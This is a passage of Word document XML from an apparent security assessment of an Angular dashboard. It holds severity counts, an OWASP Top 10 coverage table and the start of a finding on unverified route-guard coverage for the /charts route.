          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Screens Assessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OWASP Top 10 Categories Triggered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AVSV Requirements Assessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="X7d93616a1aafff416abb4ab218b6b65ebc0cfff"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. OWASP Top 10 Coverage</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Route guard configuration not provided; authorization unverifiable at module level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No cryptographic operations performed in assessed components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D3.js DOM manipulation in child components creates latent XSS/injection risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hardcoded template data and absent security architecture documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Default Angular change detection; no security headers documented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vulnerable &amp; Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chart.js, D3.js, and Nebular versions not documented; SCA not performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Identification &amp; Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentication enforcement delegated to undocumented route guards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Software &amp; Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No deserialization, no dynamic imports, no integrity-sensitive operations in assessed components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Logging &amp; Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No logging or monitoring instrumentation present across all three screens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No server-side requests or URL-fetching logic in assessed components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="32" w:name="Xd494f17e34d25d26ad4bef1ffd5b9a3c1d422a1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Screen-by-Screen Findings</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="29" w:name="Xeb0953d69989bf1180a349bb1bd933dd197c874"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Charts —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security Profile: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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Not documented — delegated to route guards in unreviewed routing module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Not documented — delegated to route guards in unreviewed routing module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data Sensitivity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low — no data rendered or processed by this component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attack Surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low — single</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;router-outlet&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">directive; no inputs, no API calls, no event handlers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Finding Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critical: 0, High: 1, Medium: 1, Low: 1, Info: 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-001: Unverified Route Guard Coverage for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hierarchy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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A01 — Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-862: Missing Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V4.1.1 — Verify that the application enforces access control rules on a trusted service layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">route registration in routing module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">All data visualizations and analytics content accessible under the</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">hierarchy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ChartsComponent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">documentation explicitly states that "the component itself contains no explicit role-based access control logic, conditional rendering guards, or permission checks" and that "access control, if any, would be enforced at the Angular Router level via route guards." The routing module files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">charts-routing.module.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app-routing.module.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) were not provided for review. This means it cannot be confirmed whether a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CanActivate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guard (such as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AuthGuard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) is applied to the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
